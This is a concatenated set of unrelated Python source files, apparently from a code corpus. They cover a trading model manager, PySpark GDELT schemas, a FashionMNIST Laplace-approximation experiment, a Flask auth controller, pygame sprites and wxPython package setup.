self.__contained_population = TradingPopulation(input_shape, 1000, self.__num_individuals,
self.__mutation_chance, self.__mutation_magnitude,
self.__crossover_chance)
consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]] = {}
for ticker, ticker_data in data.items():
daily_data, closing_prices = ticker_data
consolidated_data[ticker] = self.construct_examples(daily_data, closing_prices)
self.__train_model(consolidated_data, previous_model_file)
self.__contained_population.save(previous_model_file)
def __print_best_fitness_by_ticker(self, best_fitness_by_ticker: Dict[str, List[float]]) -> None:
output_template = "{ticker}:\n\t{:.2f}\n\t{:.2f}\n\t{:.2f}\n"
for ticker, fitness in best_fitness_by_ticker.items():
logger.logger.log(logger.INFORMATION, output_template.format(
ticker=ticker, *fitness
))
def __train_model(self, consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]], previous_model_file: str):
for i in tqdm.tqdm(range(self.__num_epochs)):
best_fitness_by_ticker = {}
for ticker, ticker_data in consolidated_data.items():
daily_data, closing_prices = ticker_data
best_fitness = self.__contained_population.train(daily_data, 1, closing_prices)
best_fitness_by_ticker[ticker] = best_fitness
self.__print_best_fitness_by_ticker(best_fitness_by_ticker)
if i % self.__save_interval == 0:
self.__contained_population.save(previous_model_file)
self.__contained_population.save(previous_model_file)
def predict_data(self, data, passback, in_model_dir):
in_dir = in_model_dir + path.sep + 'evolutionary_computation_models'
if not path.exists(in_dir):
raise FileNotFoundError("Model storage directory for EC prediction does not exist. Please run"
"Model Creation Main without the prediction flag set to True, and with the"
"EC Manager's Enabled config to True to create models."
)
self.__contained_population = TradingPopulation((0, 0), 0, 0)
self.__contained_population.load(in_dir + path.sep + 'evolution_individuals.ecp')
consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]] = {}
for ticker, ticker_data in data.items():
daily_data, closing_prices = ticker_data
consolidated_data[ticker] = self.construct_examples(daily_data, closing_prices)
predictions = {}
for ticker, prediction_data in consolidated_data.items():
daily_data, closing_prices = prediction_data
model_predictions = []
for i in range(len(daily_data)):
prediction = self.__contained_population.predict(daily_data[i])
model_predictions.append(prediction)
truths = prediction_truth_calculation(model_predictions[:-1], closing_prices)
accuracies = extract_accuracy_from_prediction_truths(truths)
prediction = self.__contained_population.predict(daily_data[-1])
predictions[ticker] = (prediction, accuracies)
return predictions
def load_configuration(self, parser: "ConfigParser"):
section = config_util.create_type_section(parser, self)
for identifier in _CONFIGURABLE_IDENTIFIERS:
if not parser.has_option(section.name, identifier):
self.write_default_configuration(section)
enabled = parser.getboolean(section.name, _ENABLED_CONFIGURATION_IDENTIFIER)
self.__periods_per_example = parser.getint(section.name, _EXAMPLE_COMBINATION_FACTOR_IDENTIFIER)
self.__num_individuals = parser.getint(section.name, _NUM_INDIVIDUALS_IDENTIFIER)
self.__num_epochs = parser.getint(section.name, _NUM_EPOCHS_IDENTIFIER)
self.__save_interval = parser.getint(section.name, _MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER)
self.__mutation_chance = parser.getfloat(section.name, _MUTATION_CHANCE_IDENTIFIER)
self.__mutation_magnitude = parser.getfloat(section.name, _MUTATION_MAGNITUDE_IDENTIFIER)
self.__crossover_chance = parser.getfloat(section.name, _CROSSOVER_CHANCE_IDENTIFIER)
block_length = parser.getint(section.name, _TDP_BLOCK_LENGTH_IDENTIFIER)
if enabled:
data_provider_registry.registry.register_consumer(
data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID,
self,
[block_length],
data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID,
keyword_args={'ema_period': [10, 15, 20]},
data_exportation_function=export_predictions,
prediction_string_serializer=string_serialize_predictions
)
def write_default_configuration(self, section: "SectionProxy"):
for i in range(len(_CONFIGURABLE_IDENTIFIERS)):
if not _CONFIGURABLE_IDENTIFIERS[i] in section:
section[_CONFIGURABLE_IDENTIFIERS[i]] = _CONFIGURATION_DEFAULTS[i]
def construct_examples(self, daily_data: np.ndarray, closing_prices: List[float]) -> Tuple[np.ndarray, List[float]]:
ret_daily_data = np.zeros((
daily_data.shape[1] - self.__periods_per_example + 1,
len(daily_data),
self.__periods_per_example
))
for i in range(self.__periods_per_example, daily_data.shape[1]+1):
ret_daily_data[i - self.__periods_per_example] = daily_data[:, i - self.__periods_per_example: i]
return ret_daily_data, closing_prices[self.__periods_per_example-1:]
if "testing" not in os.environ:
consumer = EvolutionaryComputationManager()
| 2.03125
| 2
|
homeassistant/components/wiffi/wiffi_strings.py
|
domwillcode/home-assistant
| 30,023
|
12777989
|
"""Definition of string used in wiffi json telegrams."""
# units of measurement
WIFFI_UOM_TEMP_CELSIUS = "gradC"
WIFFI_UOM_DEGREE = "grad"
WIFFI_UOM_PERCENT = "%"
WIFFI_UOM_MILLI_BAR = "mb"
WIFFI_UOM_LUX = "lux"
| 1.5
| 2
|
spark_scripts/schema.py
|
ChaithralakshmiS/Insight-DE-Project
| 1
|
12777990
|
<reponame>ChaithralakshmiS/Insight-DE-Project<gh_stars>1-10
from pyspark.sql.types import *
from pyspark.sql.types import StringType
from pyspark.sql import SparkSession
from pyspark.sql import functions as F
from pyspark.sql.types import StringType, DoubleType, IntegerType
import postgres
def get_events_schema():
eventSchema = StructType([
StructField("global_event_id",StringType(),True),
StructField("sql_date",StringType(),True),
StructField("month_year",StringType(),True),
StructField("year",StringType(),True),
StructField("fraction_date",StringType(),True),
StructField("actor1_code",StringType(),True),
StructField("actor1_name",StringType(),True),
StructField("actor1_country_code",StringType(),True),
StructField("actor1_known_group_code",StringType(),True),
StructField("actor1_ethnic_code",StringType(),True),
StructField("actor1_religion1_code",StringType(),True),
StructField("actor1_religion2_code",StringType(),True),
StructField("actor1_type1_code",StringType(),True),
StructField("actor1_type2_code",StringType(),True),
StructField("actor1_type3_code",StringType(),True),
StructField("actor2_code",StringType(),True),
StructField("actor2_name",StringType(),True),
StructField("actor2_country_code",StringType(),True),
StructField("actor2_known_group_code",StringType(),True),
StructField("actor2_ethnic_code",StringType(),True),
StructField("actor2_religion1_code",StringType(),True),
StructField("actor2_religion2_code",StringType(),True),
StructField("actor2_type1_code",StringType(),True),
StructField("actor2_type2_code",StringType(),True),
StructField("actor2_type3_code",StringType(),True),
StructField("is_root_event",StringType(),True),
StructField("event_code",StringType(),True),
StructField("event_base_code",StringType(),True),
StructField("event_root_code",StringType(),True),
StructField("quad_class",StringType(),True),
StructField("goldstein_scale",StringType(),True),
StructField("num_mentions",StringType(),True),
StructField("num_sources",StringType(),True),
StructField("num_articles",StringType(),True),
StructField("avg_tone",StringType(),True),
StructField("actor1_geo_type",StringType(),True),
StructField("actor1_geo_full_name",StringType(),True),
StructField("actor1_geo_country_code",StringType(),True),
StructField("actor1_geo_adm1_code",StringType(),True),
StructField("actor1_geo_adm2_code",StringType(),True),
StructField("actor1_geo_lat",StringType(),True),
StructField("actor1_geo_long",StringType(),True),
StructField("actor1_geo_feature_id",StringType(),True),
StructField("actor2_geo_type",StringType(),True),
StructField("actor2_geo_full_name",StringType(),True),
StructField("actor2_geo_country_code",StringType(),True),
StructField("actor2_geo_adm1_code",StringType(),True),
StructField("actor2_geo_adm2_code",StringType(),True),
StructField("actor2_geo_lat",StringType(),True),
StructField("actor2_geo_long",StringType(),True),
StructField("actor2_geo_feature_id",StringType(),True),
StructField("action_geo_type",StringType(),True),
StructField("action_geo_full_name",StringType(),True),
StructField("action_geo_country_code",StringType(),True),
StructField("action_geo_adm1_code",StringType(),True),
StructField("action_geo_adm2_code",StringType(),True),
StructField("action_geo_lat",StringType(),True),
StructField("action_geo_long",StringType(),True),
StructField("action_geo_feature_id",StringType(),True),
StructField("date_added",StringType(),True),
StructField("source_url",StringType(),True)])
return eventSchema
def transform_events_df(df):
df = df.withColumn("global_event_id", df.global_event_id.cast("LONG"))
df = df.withColumn("event_date", F.to_date(df.sql_date, format="yyyyMMdd"))
df = df.withColumn("actor1_code", df.actor1_code.cast("STRING"))
df = df.withColumn("actor1_name", df.actor1_name.cast("STRING"))
df = df.withColumn("actor1_country_code", df.actor1_country_code.cast("STRING"))
df = df.withColumn("actor1_known_group_code", df.actor1_known_group_code.cast("STRING"))
df = df.withColumn("actor1_type1_code", df.actor1_type1_code.cast("STRING"))
df = df.withColumn("actor1_type2_code", df.actor1_type2_code.cast("STRING"))
df = df.withColumn("actor1_type3_code", df.actor1_type3_code.cast("STRING"))
df = df.withColumn("actor2_code", df.actor2_code.cast("STRING"))
df = df.withColumn("actor2_name", df.actor2_name.cast("STRING"))
df = df.withColumn("actor2_country_code", df.actor2_country_code.cast("STRING"))
df = df.withColumn("actor2_known_group_code", df.actor2_known_group_code.cast("STRING"))
df = df.withColumn("actor2_type1_code", df.actor2_type1_code.cast("STRING"))
df = df.withColumn("actor2_type2_code", df.actor2_type2_code.cast("STRING"))
df = df.withColumn("actor2_type3_code", df.actor2_type3_code.cast("STRING"))
df = df.withColumn("is_root_event", df.is_root_event.cast("INT"))
df = df.withColumn("event_code", df.event_code.cast("STRING"))
df = df.withColumn("event_base_code", df.event_base_code.cast("STRING"))
df = df.withColumn("event_root_code", df.event_root_code.cast("STRING"))
df = df.withColumn("goldstein_scale", df.goldstein_scale.cast("FLOAT"))
df = df.withColumn("num_mentions", df.num_mentions.cast("INT"))
df = df.withColumn("num_sources", df.num_sources.cast("INT"))
df = df.withColumn("num_articles", df.num_articles.cast("INT"))
df = df.withColumn("avg_tone", df.avg_tone.cast("FLOAT"))
df = df.withColumn("source_url", df.source_url.cast("STRING"))
return df
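# Editor's sketch (illustrative): loading a raw GDELT events export with the
# schema above and applying the type conversions. The path and tab separator
# are assumptions about the upstream files, not part of this module.
def example_load_events(spark, events_path="s3a://my-bucket/gdelt/events/*.CSV"):
    raw_df = spark.read.csv(events_path, sep="\t", schema=get_events_schema())
    return transform_events_df(raw_df)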
def get_event_mentions_schema():
mentionSchema = StructType([
StructField("global_event_id",StringType(),True),
StructField("event_time_date",StringType(),True),
StructField("mention_time_date",StringType(),True),
StructField("mention_type",StringType(),True),
StructField("mention_source_name",StringType(),True),
StructField("mention_identifier",StringType(),True),
StructField("sentence_id",StringType(),True),
StructField("actor1_char_offset",StringType(),True),
StructField("actor2_char_offset",StringType(),True),
StructField("action_char_offset",StringType(),True),
StructField("in_raw_text",StringType(),True),
StructField("confidence",StringType(),True),
StructField("mention_doc_len",StringType(),True),
StructField("mention_doc_tone",StringType(),True),
StructField("mention_doc_translation_info",StringType(),True),
StructField("extras",StringType(),True)])
return mentionSchema
def transform_event_mentions_df(df):
df = df.withColumn("global_event_id", df.global_event_id.cast("LONG"))
df = df.withColumn("mention_type", df.mention_type.cast("STRING"))
df = df.withColumn("mention_source_name", df.mention_source_name.cast("STRING"))
df = df.withColumn("mention_identifier", df.mention_identifier.cast("STRING"))
df = df.withColumn("actor1_char_offset", df.actor1_char_offset.cast("INT"))
df = df.withColumn("actor2_char_offset", df.actor2_char_offset.cast("INT"))
df = df.withColumn("action_char_offset", df.action_char_offset.cast("INT"))
df = df.withColumn("confidence", df.confidence.cast("FLOAT"))
df = df.withColumn("mention_doc_tone", df.mention_doc_tone.cast("FLOAT"))
return df
def transform_tweeters_df(df):
df = df.withColumn('user_id', df.user_id.cast('LONG'))
df = df.withColumn('user_screen_name', df.user_screen_name.cast('STRING'))
df = df.withColumn('followers_count', df.followers_count.cast('INT'))
df = df.withColumn('friends_count', df.friends_count.cast('INT'))
df = df.withColumn('listed_count', df.listed_count.cast('INT'))
df = df.withColumn('favorite_count', df.favorite_count.cast('INT'))
df = df.withColumn('statuses_count', df.statuses_count.cast('INT'))
df = df.withColumn('user_location', df.user_location.cast('STRING'))
return df
def transform_tweets_df(df):
#df = df.withColumn('created_at',F.to_date(df.created_at, format="yyyyMMdd"))
df = df.withColumn("created_at",F.to_date(df.created_at, "EEE MMM dd HH:mm:ss Z yyyy"))
df = df.withColumn('status_id', df.status_id.cast('LONG'))
df = df.withColumn('user_id', df.user_id.cast('LONG'))
df = df.withColumn('url', df.url.cast('STRING'))
df = df.withColumn('reply_count', df.reply_count.cast('INT'))
df = df.withColumn('retweet_count', df.retweet_count.cast('INT'))
df = df.withColumn('quote_count', df.quote_count.cast('INT'))
df = df.withColumn('favorite_count', df.favorite_count.cast('INT'))
return df
def transform_retweets_df(df):
df = df.withColumn('retweet_status_id', df.retweet_status_id.cast('LONG'))
df = df.withColumn('retweet_src_status_id', df.retweet_src_status_id.cast('LONG'))
return df
def transform_quotes_df(df):
df = df.withColumn('quote_status_id', df.quote_status_id.cast('LONG'))
df = df.withColumn('quote_src_status_id', df.quote_src_status_id.cast('LONG'))
return df
| 2.484375
| 2
|
v602/python/vorbereitung.py
|
chrbeckm/anfaenger-praktikum
| 2
|
12777991
|
<gh_stars>1-10
import numpy as np
import scipy.constants as const
planckh = const.Planck
cspeed = const.speed_of_light
charge = const.elementary_charge
d = 201.4*10**(-12)
ordnung = np.array([29, 29, 30, 32, 35, 37, 38, 40, 41])
ek = np.array([8.048, 8.905, 9.673, 11.115, 13.483, 15.202, 16.106, 17.997, 18.985])
ek = ek * charge * 10**3
rhyd = 13.6
anzahl = 9
theta = np.ones(anzahl)
sigma = np.ones(anzahl)
def ftheta(f):
return np.arcsin((planckh*cspeed)/(2*d*f))*180/np.pi
def fsigma(f, z):
return (z-np.sqrt(f/(rhyd*charge)))
for i in range(anzahl):
theta[i] = ftheta(ek[i])
sigma[i] = fsigma(ek[i], ordnung[i])
np.savetxt('build/vorbereitung.txt', np.column_stack([ordnung, ek/charge, theta, sigma]),
header='ordnung, ek, theta, sigma')
| 2.09375
| 2
|
main.py
|
oliversvane/Classification-With-Laplace-Approximation
| 2
|
12777992
|
<reponame>oliversvane/Classification-With-Laplace-Approximation<gh_stars>1-10
# module load python3/3.8.11
# module load cudnn/v8.2.0.53-prod-cuda-11.3
import warnings
import os
import torch
import torch.distributions as dists
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms, utils
import numpy as np
from netcal.metrics import ECE
from laplace import Laplace
from torch.utils.tensorboard import SummaryWriter
import matplotlib.pyplot as plt
warnings.simplefilter("ignore", UserWarning)
writer = SummaryWriter('runs/fashion_mnist_experiment_1')
#np.random.seed(7777)
#torch.manual_seed(7777)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = True
n_epochs = 1
batch_size_train = 64
batch_size_test = 1
learning_rate = 0.01
momentum = 0.5
log_interval = 10
num_classes=10
#TODO Create better data loader with augmentation
train_loader = torch.utils.data.DataLoader(
datasets.FashionMNIST('./files/', train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor()
])),
batch_size=batch_size_train, shuffle=True)
test_loader = torch.utils.data.DataLoader(
datasets.FashionMNIST('./files/', train=False, download=True,
transform=transforms.Compose([
transforms.ToTensor()
])),
batch_size=batch_size_test, shuffle=True)
targets = torch.cat([y for x, y in test_loader], dim=0).cpu()
class CNN(nn.Module):
def __init__(self):
super(CNN, self).__init__()
self.conv1 = nn.Conv2d(1, 32, 3, 1)
self.conv2 = nn.Conv2d(32, 64, 3, 1)
self.conv3 = nn.Conv2d(64, 32, 5, 1)
self.fc1 = nn.Linear(800, 10)
self.relu = nn.ReLU()
self.maxpool = nn.MaxPool2d(4, 4)
    # Define the network structure
def forward(self,x):
out = nn.Sequential(
self.conv1,
self.relu,
self.conv2,
self.relu,
self.conv3,
self.relu,
self.maxpool,
            nn.Flatten(),
            self.fc1)(x)
return out
model = CNN()
#Tensorboard
dataiter = iter(train_loader)
images, labels = next(dataiter)
img_grid = utils.make_grid(images)
writer.add_image('four_fashion_mnist_images', img_grid)
writer.add_graph(model, images)
writer.close()
optimizer = optim.SGD(model.parameters(), lr=learning_rate,
momentum=momentum)
train_losses = []
train_counter = []
test_losses = []
test_counter = [i*len(train_loader.dataset) for i in range(n_epochs + 1)]
def train(epoch):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
optimizer.zero_grad()
output = model(data)
loss = nn.CrossEntropyLoss()(output, target)
loss.backward()
optimizer.step()
if batch_idx % log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()), end="\r")
train_losses.append(loss.item())
train_counter.append(
(batch_idx*64) + ((epoch-1)*len(train_loader.dataset)))
if not os.path.exists("./models"):
os.mkdir('./models')
torch.save(model.state_dict(), './models/FashionMNIST_plain.pt')
if not os.path.exists("./optimizer"):
os.mkdir('./optimizer')
torch.save(optimizer.state_dict(), './optimizer/optimizer.pth')
def test():
print("Begin pred print")
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in test_loader:
output = model(data)
            # The model outputs raw logits, so use cross_entropy (summed over the
            # batch) to match the CrossEntropyLoss used during training.
            test_loss += F.cross_entropy(output, target, reduction='sum').item()
pred = output.data.max(1, keepdim=True)[1]
print(output)
correct += pred.eq(target.data.view_as(pred)).sum()
test_loss /= len(test_loader.dataset)
test_losses.append(test_loss)
print('\nTest set: Avg. loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset)))
for epoch in range(1, n_epochs + 1):
train(epoch)
test()
@torch.no_grad()
def predict(dataloader, model, laplace=False):
py = []
for x, _ in dataloader:
if laplace:
py.append(model(x))
else:
py.append(torch.softmax(model(x), dim=-1))
return torch.cat(py).cpu()
probs_map = predict(test_loader, model, laplace=False)
acc_map = (probs_map.argmax(-1) == targets).float().mean()
ece_map = ECE(bins=10).measure(probs_map.numpy(), targets.numpy())
nll_map = -dists.Categorical(probs_map).log_prob(targets).mean()
print(f'[MAP] Acc.: {acc_map:.1%}; ECE: {ece_map:.1%}; NLL: {nll_map:.3}')
# Laplace approximation (last-layer, diagonal Hessian)
la = Laplace(model, 'classification',
             subset_of_weights='last_layer',
             hessian_structure='diag')
la.fit(train_loader)
la.optimize_prior_precision(method='marglik')
probs_laplace = predict(test_loader, la, laplace=True)
acc_laplace = (probs_laplace.argmax(-1) == targets).float().mean()
ece_laplace = ECE(bins=10).measure(probs_laplace.numpy(), targets.numpy())
nll_laplace = -dists.Categorical(probs_laplace).log_prob(targets).mean()
print(f'[Laplace] Acc.: {acc_laplace:.1%}; ECE: {ece_laplace:.1%}; NLL: {nll_laplace:.3}')
print("All done")
# Use kwargs for calibration-method-specific parameters
def test2(calibration_method=None, **kwargs):
preds = []
labels_oneh = []
correct = 0
model.eval()
print("We did it")
with torch.no_grad():
for data in test_loader:
images, labels = data[0], data[1]
pred = model(images)
if calibration_method:
pred = calibration_method(pred, kwargs)
# Get softmax values for net input and resulting class predictions
sm = nn.Softmax(dim=1)
pred = sm(pred)
_, predicted_cl = torch.max(pred.data, 1)
pred = pred.cpu().detach().numpy()
# Convert labels to one hot encoding
label_oneh = torch.nn.functional.one_hot(labels, num_classes=num_classes)
label_oneh = label_oneh.cpu().detach().numpy()
preds.extend(pred)
labels_oneh.extend(label_oneh)
# Count correctly classified samples for accuracy
correct += sum(predicted_cl == labels).item()
print("We did it")
preds = np.array(preds).flatten()
labels_oneh = np.array(labels_oneh).flatten()
correct_perc = correct / len(test_loader.dataset)
print('Accuracy of the network on the test images: %d %%' % (100 * correct_perc))
print(correct_perc)
return preds, labels_oneh
preds, labels_oneh = test2()
print(labels_oneh)
print(preds)
def calc_bins(preds):
# Assign each prediction to a bin
num_bins = 10
bins = np.linspace(0.1, 1, num_bins)
binned = np.digitize(preds, bins)
# Save the accuracy, confidence and size of each bin
bin_accs = np.zeros(num_bins)
bin_confs = np.zeros(num_bins)
bin_sizes = np.zeros(num_bins)
for bin in range(num_bins):
bin_sizes[bin] = len(preds[binned == bin])
if bin_sizes[bin] > 0:
bin_accs[bin] = (labels_oneh[binned==bin]).sum() / bin_sizes[bin]
bin_confs[bin] = (preds[binned==bin]).sum() / bin_sizes[bin]
return bins, binned, bin_accs, bin_confs, bin_sizes
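# A minimal sketch (not in the original script) turning the bin statistics
# above into ECE/MCE numbers; it assumes `preds` is the flattened probability
# array produced by test2() and reuses the global `labels_oneh` via calc_bins.
def get_metrics(preds):
    _, _, bin_accs, bin_confs, bin_sizes = calc_bins(preds)
    total = bin_sizes.sum()
    # Expected calibration error: size-weighted gap between accuracy and confidence
    ece = np.sum((bin_sizes / total) * np.abs(bin_accs - bin_confs))
    # Maximum calibration error: worst-case gap over the bins
    mce = np.max(np.abs(bin_accs - bin_confs))
    return ece, mce
# e.g. ece, mce = get_metrics(preds)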
from visualization.plot import * #TODO FIX PLOTS
def T_scaling(logits, args):
temperature = args.get('temperature', None)
return torch.div(logits, temperature)
temperature = nn.Parameter(torch.ones(1).cpu())
args = {'temperature': temperature}
criterion = nn.CrossEntropyLoss()
# Removing strong_wolfe line search results in jump after 50 epochs
optimizer = optim.LBFGS([temperature], lr=0.001, max_iter=10000, line_search_fn='strong_wolfe')
logits_list = []
labels_list = []
temps = []
losses = []
for i, data in enumerate(test_loader):
images, labels = data[0], data[1]
model.eval()
with torch.no_grad():
logits_list.append(model(images))
labels_list.append(labels)
# Create tensors
logits_list = torch.cat(logits_list).cpu()
labels_list = torch.cat(labels_list).cpu()
def _eval():
    optimizer.zero_grad()
    loss = criterion(T_scaling(logits_list, args), labels_list)
    loss.backward()
    temps.append(temperature.item())
    losses.append(loss.item())
    return loss
optimizer.step(_eval)
print('Final T_scaling factor: {:.2f}'.format(temperature.item()))
plt.subplot(121)
plt.plot(list(range(len(temps))), temps)
plt.subplot(122)
plt.plot(list(range(len(losses))), losses)
plt.savefig("test.png")
preds_original, _ = test2()
preds_calibrated, _ = test2(T_scaling, temperature=temperature)
draw_reliability_graph(preds_original,"soft_")
draw_reliability_graph(preds_calibrated,"lap_")
| 2.375
| 2
|
pykomposter/lib.py
|
algoravioli/pykomposter
| 0
|
12777993
|
<reponame>algoravioli/pykomposter
import music21
import numpy as np
import pandas as pd
# function definitions
import actions
# behaviours:
import behaviours
# metabehaviours:
import metabehaviours
# microactions
import microactions
class pykomposter:
def __init__(self):
super(pykomposter, self).__init__()
self.outlook = {
"tendency": None, # tendency: how much of stated behaviour is it likely to follow. List: [2ndary behaviour, float] eg. [stochastic, 0.2]
"metabehaviour": None, # how the komposter model decides the actions to take. Reference (Variable): e.g metabehaviour.random
"op_char": dict(), # operational characteristics: dict={} containing time-dependencies, and content-dependencies.
}
# setters
def setTendency(self, tendency_list):
if len(tendency_list) == 2:
if isinstance(tendency_list[0], str):
if isinstance(tendency_list[1], float):
self.outlook["tendency"] = tendency_list
else:
raise RuntimeError(
"ERROR: 2nd argument of tendency needs to be a float."
)
else:
raise RuntimeError(
"ERROR: 1st argument of tendency needs to be a string."
)
else:
raise RuntimeError("ERROR: Tendency list must only contain 2 elements")
def setMetaBehaviour(self, metabehaviour):
self.outlook["metabehaviour"] = metabehaviour
def setOpChar(self, opchardict):
self.outlook["op_char"] = opchardict
##########################
# BEHAVIOUR INTERACTIONS #
##########################
def withBehaviour(self, behaviour, compose, state_transitions=100, cubeDict=None):
# print(f" state = {state_transitions}")
score = compose(
self.outlook["metabehaviour"],
behaviour,
self.outlook["op_char"],
state_transitions,
cubeDict,
)
return score
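# Minimal usage sketch (assumption, not part of the original file): the exact
# behaviour/metabehaviour objects and the compose callable live in the sibling
# modules, so the attribute names below are illustrative only.
# komposter = pykomposter()
# komposter.setTendency(["stochastic", 0.2])
# komposter.setMetaBehaviour(metabehaviours.random)          # hypothetical attribute
# komposter.setOpChar({"time_dependencies": None})           # hypothetical keys
# score = komposter.withBehaviour(behaviours.default, actions.compose)  # hypothetical names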
| 2.59375
| 3
|
Background_Straws.py
|
Zucchi43/Flappy_Turtle
| 0
|
12777994
|
import pygame
size = width, height = 350,500 #Screen Size
class Background(pygame.sprite.Sprite):
def __init__(self, image_file, location):
pygame.sprite.Sprite.__init__(self) #call Sprite initializer
self.image = pygame.image.load(image_file)
self.rect = self.image.get_rect()
self.rect.left, self.rect.top = location
class Straw_class (pygame.sprite.Sprite):
def __init__(self, start_x, start_y, size_x, size_y,inverted):
super().__init__()
self.image = pygame.transform.scale(pygame.image.load('Images/canudo_mal_feito.png'), (size_x,size_y))
if inverted: self.image = pygame.transform.rotozoom(self.image,180,1)
self.rect = self.image.get_rect()
self.rect.move_ip((start_x,start_y))
self.vel = [0, 0]
self.accel = [-4,0]
def update(self):
self.vel[0] = self.accel[0]
self.vel[1] = self.accel[1]
self.rect.move_ip(*self.vel)
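# Minimal usage sketch (assumption, not part of the original file): how these
# sprites might be driven from a game loop; the image path and sizes below are
# illustrative only.
# pygame.init()
# screen = pygame.display.set_mode(size)
# background = Background('Images/background.png', (0, 0))   # hypothetical image path
# straws = pygame.sprite.Group(Straw_class(width, 0, 60, 250, inverted=True))
# straws.update()
# screen.blit(background.image, background.rect)
# straws.draw(screen)
# pygame.display.flip()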
| 3
| 3
|
pkg/controllers/auth.py
|
azupatrick0/taskmanagist
| 0
|
12777995
|
from flask import Flask, request, make_response
import re
from app import db, bcrypt
from pkg.models.auth_models import user
from pkg.helpers.authentication import generateToken
class Auth:
def init(self):
pass
def signup(self):
name = request.json['name']
email = request.json['email']
unhashed_password = request.json['password']
password = bcrypt.generate_password_hash(
unhashed_password).decode('utf-8')
if(len(email) < 1):
return make_response({
'status': 400,
'data': {
'message': "Email is requred",
}
}, 400)
        elif(len(unhashed_password) < 6):
return make_response({
'status': 400,
'data': {
'message': "Password must be 6 or more characters",
}
}, 400)
        elif(re.search(r"^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$", email)):
response = user.query.filter_by(email=email).first()
if(response):
return make_response({
'status': 409,
'data': {
'error': 'User already exists'
}
}, 409)
else:
new_user = user(name, email, password)
db.session.add(new_user)
db.session.commit()
auth_user = {
'id': new_user.id,
'name': new_user.name,
'email': new_user.email,
}
return make_response({
'status': 201,
'data': {
'user': {
**auth_user,
'token': generateToken(auth_user)
}
}
}, 201)
else:
# email is not valid
return make_response({
'status': 400,
'data': {
'message': "Email is invalid",
}
}, 400)
def login(self):
email = request.json['email']
unhashed_password = request.json['password']
        response = user.query.filter_by(email=email).first()
        if(not response):
            return make_response({
                'status': 404,
                'data': {
                    'message': 'User not found',
                }
            }, 404)
        elif(not bcrypt.check_password_hash(response.password, unhashed_password)):
            return make_response({
                'status': 400,
                'data': {
                    'message': 'Invalid login credentials',
                }
            }, 400)
else:
auth_user = {
'id': response.id,
'name': response.name,
'email': response.email,
}
return make_response({
'status': 200,
'data': {
'user': {
**auth_user,
'token': generateToken(auth_user)
}
}
}, 200)
auth = Auth()
| 2.96875
| 3
|
Lib/site-packages/wx-3.0-msw/wx/__init__.py
|
jickieduan/python27
| 5
|
12777996
|
<reponame>jickieduan/python27<filename>Lib/site-packages/wx-3.0-msw/wx/__init__.py
#----------------------------------------------------------------------------
# Name: __init__.py
# Purpose: The presence of this file turns this directory into a
# Python package.
#
# Author: <NAME>
#
# Created: 8-Aug-1998
# RCS-ID: $Id$
# Copyright: (c) 1998 by Total Control Software
# Licence: wxWindows license
#----------------------------------------------------------------------------
import __version__
__version__ = __version__.VERSION_STRING
__all__ = [
# Sub-packages
'build',
'lib',
'py',
'tools',
# other modules
'animate',
'aui',
'calendar',
'combo',
'grid',
'html',
'media',
'richtext',
'webkit',
'wizard',
'xrc',
# contribs (need a better way to find these...)
'gizmos',
'glcanvas',
'stc',
]
# Load the package namespace with the core classes and such
from wx._core import *
del wx
if 'wxMSW' in PlatformInfo:
__all__ += ['activex']
# Load up __all__ with all the names of items that should appear to be
# defined in this package so epydoc will document them that way.
import wx._core
__docfilter__ = wx._core.__DocFilter(globals())
__all__ += [name for name in dir(wx._core) if not name.startswith('_')]
#----------------------------------------------------------------------------
| 2.15625
| 2
|
project_generator/tool.py
|
aethaniel/project_generator
| 1
|
12777997
|
# Copyright 2014 0xc0170
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# exporters
from .exporters.iar import IARExporter
from .exporters.coide import CoideExporter
from .exporters.gccarm import MakefileGccArmExporter
from .exporters.uvision import UvisionExporter
from .exporters.eclipse import EclipseGnuARMExporter
# builders
from .builders.iar import IARBuilder
from .builders.gccarm import MakefileGccArmBuilder
from .builders.uvision import UvisionBuilder
EXPORTERS = {
'uvision': UvisionExporter,
'make_gcc_arm': MakefileGccArmExporter,
'iar': IARExporter,
'coide': CoideExporter,
'eclipse_make_gcc_arm': EclipseGnuARMExporter,
}
BUILDERS = {
'uvision': UvisionBuilder,
'make_gcc_arm': MakefileGccArmBuilder,
'iar': IARBuilder,
}
def export(data, tool, env_settings):
""" Invokes tool generator. """
if tool not in EXPORTERS:
raise RuntimeError("Exporter does not support defined tool.")
Exporter = EXPORTERS[tool]
exporter = Exporter()
project_path = exporter.generate(data, env_settings)
return project_path
def build(projects, project_path, tool, env_settings, root):
""" Invokes builder for specificed tool. """
if tool not in BUILDERS:
raise RuntimeError("Builder does not support defined tool.")
Builder = BUILDERS[tool]
builder = Builder()
builder.build(projects, project_path, env_settings, root)
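# Minimal usage sketch (assumption, not part of the original module): the
# project data and environment settings normally come from project_generator's
# own records; the names below are placeholders.
# project_path = export(project_data, 'make_gcc_arm', env_settings)
# build(['my_project'], project_path, 'make_gcc_arm', env_settings, root='.')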
| 1.851563
| 2
|
tests/core/test_project_init.py
|
pypipet/pypipet
| 0
|
12777998
|
<filename>tests/core/test_project_init.py
from unittest.mock import Mock
import pytest
